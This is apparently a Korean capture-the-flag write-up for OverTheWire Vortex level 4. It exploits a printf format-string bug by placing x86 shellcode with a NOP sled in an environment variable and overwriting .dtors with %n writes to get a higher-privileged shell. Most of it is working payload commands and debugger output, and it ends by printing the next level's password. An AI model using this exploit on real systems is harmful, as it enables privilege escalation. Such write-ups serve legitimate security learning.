http://www.overthewire.org/wargames/vortex/level4.shtml
// -- andrewg, original author was zen-parse :)
#include <stdlib.h>
int main(int argc, char **argv)
{
if(argc) exit(0);
printf(argv[3]);
exit(EXIT_FAILURE);
}먼저 회피를 위해서 if(argc)를 회피해야 하므로 execl() 함수를 이용한다. 방법은 아래와 같이 간단하게 Python 스크립트로 작성하여 회피할 수 있다.
vortex4@games /tmp/byjjoon $ cat go.py
#!/usr/bin/python
import os
os.execl('/vortex/level4')
vortex4@games /tmp/byjjoon $ ./go.py
SHELL=/bin/bashvortex4@games /tmp/byjjoon $ 회피를 하여 실행한 결과 환경 변수에 등록된 값이 나오는 것을 확인할 수 있었다.
즉, 저 환경변수를 이용하여 포멧스트링을 통해 쉘을 획득할 수 있을 것으로 보인다.
먼저 공격을 하기 전 쉘코드를 미리 환경변수에 등록해 두도록 하자. 사용한 쉘코드는 이전 레벨에서 사용했던 쉘코드이며 NOP를 넉넉 잡아 100개를 넣어 주었다.
vortex4@games /tmp/byjjoon $ export SHELLCODE="`python -c "print '\x90'*100 + '\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80'"`"
vortex4@games /tmp/byjjoon $ ./go.py
TERM=linuxvortex4@games /tmp/byjjoon $
환경변수에 쉘코드를 올린 후 다시 실행을 해보면 방금 입력한 환경변수로 인해 다른 환경변수가 출력된 것을 알 수 있다. 저 곳에 원하는 코드를 넣어 포멧스트링을 이용하여 쉘을 획득할 것이다.
이제 OFFSET을 구해 보도록 하자.
vortex4@games /tmp/byjjoon $ export TERM=`python -c "print 'AAAA' + '\x2c\x95\x04\x08' + 'BBBB' + '\x2e\x95\x04\x08' + '%8x'*172 + '%10000c%x%10000c%x' + 'BBB'"`
vortex4@games /tmp/byjjoon $ ./go.py
TERM=AAAA,뷓BBB.뷳f7ff434bf7ff3d8 80483a640139e344001ac80bf7ff4084003829e 0bf7ff434bf7ff438 80482ac 0400127b0400381fd4001afc4 0 80482ac 0 80482cd 804835c 0bf7ff434 804839c 80483cc4000ddd9bf7ff42c40016000 0 0bf7ff529bf7ff5debf7ff66fbf7ff89ebf7ff8aebf7ff8d0bf7ff8ecbf7ff8ffbf7ff90cbf7ffda9bf7ffdbdbf7ffe16bf7ffe2dbf7ffe7dbf7ffe8ebf7ffe9fbf7ffeb0bf7ffebabf7ffec2bf7ffedcbf7ffef1bf7fff01bf7fff0cbf7fff18bf7fff4bbf7fff64bf7fffe3 0 10bfebfbff 6 1000 11 64 3 8048034 4 20 5 6 740000000 8 0 9 80482ac b 1fa c 1fb d 1fa e 1fa fbf7ff524 0 0 0363836694e414d0048544150616d2f3d752f3a6e6c2f72736c61636f6168732f6d2f65722f3a6e612f72737572616873616d2f65752f3a6e732f7273657261686e69622f6c69747561642d73692f61742d3638366c2d637078756e69756e672d312e322f616d2f38752f3a6e732f7273657261686363672f7461642d36692f61702d3638696c2d632d78756e2f756e672e342e33616d2f36652f3a6e6a2f63742d617661666e6f63732f6769657473796d762d6d6e616d2f4853002f434c4c453d45444f909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909958316ac38980cd466ac189b080cd586e68520b6868732f69622f2fd189e389540080cd3d4d5245
.
.
.
[생략]
.
.
A804952c
.
.
[생략]
.
.
B804952eBBBvortex4@games /tmp/byjjoon $
172개와 더미로 B를 3개 붙여 줬을때 정확하게 0x0804952e 값이 마지막에 출력됨을 확인할 수 있었다.
이제 쉘코드의 위치를 GDB를 통해 확인하여 보도록 하자.
vortex4@games /tmp/byjjoon $ gdb -q /vortex/level4
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048362
(gdb) r
Starting program: /vortex/level4
Breakpoint 1, 0x08048362 in main ()
(gdb) x/32wx $esp
0xbf7ff3b0: 0x40139e34 0x4001ac80 0xbf7ff3e8 0x4003829e
0xbf7ff3c0: 0x00000001 0xbf7ff414 0xbf7ff41c 0x080482ac
0xbf7ff3d0: 0x00000000 0x400127b0 0x400381fd 0x4001afc4
0xbf7ff3e0: 0x00000001 0x080482ac 0x00000000 0x080482cd
0xbf7ff3f0: 0x0804835c 0x00000001 0xbf7ff414 0x0804839c
0xbf7ff400: 0x080483cc 0x4000ddd9 0xbf7ff40c 0x40016000
0xbf7ff410: 0x00000001 0xbf7ff51c 0x00000000 0xbf7ff52b
0xbf7ff420: 0xbf7ff5e0 0xbf7ff671 0xbf7ff681 0xbf7ff8b0
(gdb)
0xbf7ff430: 0xbf7ff8d2 0xbf7ff8e5 0xbf7ff8f2 0xbf7ffd8f
0xbf7ff440: 0xbf7ffd9b 0xbf7ffdf4 0xbf7ffe08 0xbf7ffe58
0xbf7ff450: 0xbf7ffe6f 0xbf7ffe7e 0xbf7ffe8f 0xbf7ffea0
0xbf7ff460: 0xbf7ffeb1 0xbf7ffeba 0xbf7ffed4 0xbf7ffedc
0xbf7ff470: 0xbf7ffee6 0xbf7ffef6 0xbf7fff0b 0xbf7fff17
0xbf7ff480: 0xbf7fff22 0xbf7fff55 0xbf7fff6e 0x00000000
0xbf7ff490: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbf7ff4a0: 0x00000011 0x00000064 0x00000003 0x08048034
(gdb)
0xbf7ff4b0: 0x00000004 0x00000020 0x00000005 0x00000006
0xbf7ff4c0: 0x00000007 0x40000000 0x00000008 0x00000000
0xbf7ff4d0: 0x00000009 0x080482ac 0x0000000b 0x000001fa
0xbf7ff4e0: 0x0000000c 0x000001fa 0x0000000d 0x000001fa
0xbf7ff4f0: 0x0000000e 0x000001fa 0x0000000f 0xbf7ff517
0xbf7ff500: 0x00000000 0x00000000 0x00000000 0x00000000
0xbf7ff510: 0x00000000 0x69000000 0x00363836 0x726f762f
0xbf7ff520: 0x2f786574 0x6576656c 0x4d00346c 0x41504e41
(gdb)
0xbf7ff530: 0x2f3d4854 0x3a6e616d 0x7273752f 0x636f6c2f
0xbf7ff540: 0x732f6c61 0x65726168 0x6e616d2f 0x73752f3a
0xbf7ff550: 0x68732f72 0x2f657261 0x3a6e616d 0x7273752f
0xbf7ff560: 0x6168732f 0x622f6572 0x74756e69 0x2d736c69
0xbf7ff570: 0x61746164 0x3836692f 0x63702d36 0x6e696c2d
0xbf7ff580: 0x672d7875 0x322f756e 0x2f38312e 0x3a6e616d
0xbf7ff590: 0x7273752f 0x6168732f 0x672f6572 0x642d6363
0xbf7ff5a0: 0x2f617461 0x36383669 0x2d63702d 0x756e696c
(gdb)
0xbf7ff5b0: 0x6e672d78 0x2e332f75 0x2f362e34 0x3a6e616d
0xbf7ff5c0: 0x6374652f 0x76616a2f 0x6f632d61 0x6769666e
0xbf7ff5d0: 0x7379732f 0x2d6d6574 0x6d2f6d76 0x002f6e61
0xbf7ff5e0: 0x4c454853 0x444f434c 0x90903d45 0x90909090
0xbf7ff5f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf7ff600: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf7ff610: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf7ff620: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbf7ff630: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf7ff640: 0x90909090 0x90909090 0x90909090 0x316a9090
0xbf7ff650: 0x80cd9958 0xc189c389 0xcd58466a 0x520bb080
0xbf7ff660: 0x732f6e68 0x2f2f6868 0xe3896962 0x80cdd189
0xbf7ff670: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162
0xbf7ff680: 0x52455400 0x41413d4d 0x952c4141 0x42420804
0xbf7ff690: 0x952e4242 0x38250804 0x78382578 0x25783825
0xbf7ff6a0: 0x38257838 0x78382578 0x25783825 0x38257838
(gdb) q
The program is running. Exit anyway? (y or n) y
vortex4@games /tmp/byjjoon $ SHELLCODE = 0xbf7ff600
이제 .DTORS 주소를 확인해 보도록 하자.
vortex4@games /tmp/byjjoon $ objdump -s -j .dtors /vortex/level4
/vortex/level4: file format elf32-i386
Contents of section .dtors:
8049528 ffffffff 00000000 ........
vortex4@games /tmp/byjjoon $ .DTORS = 0x08049528
이제 필요한 주소를 모두 구하였으니 계산을 하여 다시 한번 공격을 해보도록 하자.
vortex4@games /tmp/byjjoon $ python -c "print int('f600', 16)"
62976
vortex4@games /tmp/byjjoon $ python -c "print int('1bf7f', 16) - int('f600', 16)"
51583
62976 - 5 - (8 * 172) - 16 = 61579
5 : TERM=
8 172 : %8x 172
16 : AAAA + BBBB + .dtors * 2
vortex4@games /tmp/byjjoon $ export TERM=`python -c "print 'AAAA' + '\x2c\x95\x04\x08' + 'BBBB' + '\x2e\x95\x04\x08' + '%8x'*172 + '%61579c%x%51583c%x' + 'BBB'"`
vortex4@games /tmp/byjjoon $ ./go.py
TERM=AAAA,뷓BBB.뷳f7ff434bf7ff3d8 80483a640139e344001ac80bf7ff4084003829e 0bf7ff434bf7ff438 80482ac 0400127b0400381fd4001afc4 0 80482ac 0 80482cd 804835c 0bf7ff434 804839c 80483cc4000ddd9bf7ff42c40016000 0 0bf7ff529bf7ff5debf7ff66fbf7ff89ebf7ff8aebf7ff8d0bf7ff8ecbf7ff8ffbf7ff90cbf7ffda9bf7ffdbdbf7ffe16bf7ffe2dbf7ffe7dbf7ffe8ebf7ffe9fbf7ffeb0bf7ffebabf7ffec2bf7ffedcbf7ffef1bf7fff01bf7fff0cbf7fff18bf7fff4bbf7fff64bf7fffe3 0 10bfebfbff 6 1000 11 64 3 8048034 4 20 5 6 740000000 8 0 9 80482ac b 1fa c 1fb d 1fa e 1fa fbf7ff524 0 0 0363836694e414d0048544150616d2f3d752f3a6e6c2f72736c61636f6168732f6d2f65722f3a6e612f72737572616873616d2f65752f3a6e732f7273657261686e69622f6c69747561642d73692f61742d3638366c2d637078756e69756e672d312e322f616d2f38752f3a6e732f7273657261686363672f7461642d36692f61702d3638696c2d632d78756e2f756e672e342e33616d2f36652f3a6e6a2f63742d617661666e6f63732f6769657473796d762d6d6e616d2f4853002f434c4c453d45444f909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909958316ac38980cd466ac189b080cd586e68520b6868732f69622f2fd189e389540080cd3d4d5245
.
.
.
[생략]
.
.
A804952c
.
.
.
[생략]
.
.
.
B804952eBBBvortex4@games /tmp/byjjoon $ 주소가 정확하게 출력됨을 확인한 후 %x를 %n으로 변경 후 다시 공격을 해보자.
vortex4@games /tmp/byjjoon $ export TERM=`python -c "print 'AAAA' + '\x2c\x95\x04\x08' + 'BBBB' + '\x2e\x95\x04\x08' + '%8x'*172 + '%61579c%n%51583c%n' + 'BBB'"`
vortex4@games /tmp/byjjoon $ ./go.py
TERM=AAAA,뷓BBB.뷳f7ff434bf7ff3d8 80483a640139e344001ac80bf7ff4084003829e 0bf7ff434bf7ff438 80482ac 0400127b0400381fd4001afc4 0 80482ac 0 80482cd 804835c 0bf7ff434 804839c 80483cc4000ddd9bf7ff42c40016000 0 0bf7ff529bf7ff5debf7ff66fbf7ff89ebf7ff8aebf7ff8d0bf7ff8ecbf7ff8ffbf7ff90cbf7ffda9bf7ffdbdbf7ffe16bf7ffe2dbf7ffe7dbf7ffe8ebf7ffe9fbf7ffeb0bf7ffebabf7ffec2bf7ffedcbf7ffef1bf7fff01bf7fff0cbf7fff18bf7fff4bbf7fff64bf7fffe3 0 10bfebfbff 6 1000 11 64 3 8048034 4 20 5 6 740000000 8 0 9 80482ac b 1fa c 1fb d 1fa e 1fa fbf7ff524 0 0 0363836694e414d0048544150616d2f3d752f3a6e6c2f72736c61636f6168732f6d2f65722f3a6e612f72737572616873616d2f65752f3a6e732f7273657261686e69622f6c69747561642d73692f61742d3638366c2d637078756e69756e672d312e322f616d2f38752f3a6e732f7273657261686363672f7461642d36692f61702d3638696c2d632d78756e2f756e672e342e33616d2f36652f3a6e6a2f63742d617661666e6f63732f6769657473796d762d6d6e616d2f4853002f434c4c453d45444f909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909958316ac38980cd466ac189b080cd586e68520b6868732f69622f2fd189e389540080cd3d4d5245
.
.
.
[생략]
.
.
bash: /home/vortex/vortex5/.bashrc: Permission denied
vortex5@games /tmp/byjjoon $ id
uid=507(vortex5) gid=506(vortex4) groups=506(vortex4)
vortex5@games /tmp/byjjoon $ cat /etc/vortex_pass/vortex5
:4VtbC4lr
vortex5@games /tmp/byjjoon $ 